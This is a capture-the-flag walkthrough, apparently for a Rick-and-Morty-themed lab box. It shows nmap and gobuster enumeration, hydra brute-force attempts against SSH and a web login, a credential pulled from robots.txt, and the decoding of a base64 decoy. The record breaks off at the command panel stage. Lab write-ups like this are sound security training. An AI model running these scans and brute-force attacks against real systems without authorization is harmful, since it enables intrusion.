Website

Source:

<!--

    Note to self, remember username!

    Username: R1ckRul3s

  -->

Nmap

$ nmap -A 10.10.134.61
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f8:89:83:22:6c:ab:84:05:23:b0:f6:d2:c0:42:e3:a6 (RSA)
|   256 cc:a0:09:40:f9:7c:3d:9c:ef:33:d1:19:26:88:45:5b (ECDSA)
|_  256 f6:a1:ce:33:f5:74:3f:f0:a2:f5:6c:ec:0e:b0:73:f3 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Gobuster

$ gobuster dir -u 10.10.134.61 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

/assets (Status: 301) # nothing
/robots.txt (Status: 200) # "Wubbalubbadubdub"

SSH

$ hydra -l R1ckRul3s -P /usr/share/wordlists/rockyou.txt ssh://10.10.134.61
[ERROR] target ssh://10.10.134.61:22/ does not support password authentication (method reply 4).

$ nmap 10.10.134.61 --script ssh-brute --script-args userdb=user,passdb=/usr/share/wordlists/rockyou.txt
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
|_ssh-brute: Password authentication not allowed

Login Page

Try /login.php, success!

$ hydra -l R1ckRul3s -P /usr/share/wordlists/rockyou.txt 10.10.134.61 http-post-form "/login.php:username=^USER^&password=^PASS^&sub=Login:Invalid username or password." -V
# nothing

Try "Wubbalubbadubdub" from robots.txt → success!

Portal

To "Command Panel". All other tabs → /denied.php "Only the REAL rick can view this page.."

View source:

<!-- Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0== -->
kali$ echo -n Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0== | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d
rabbit hole

Trying commands: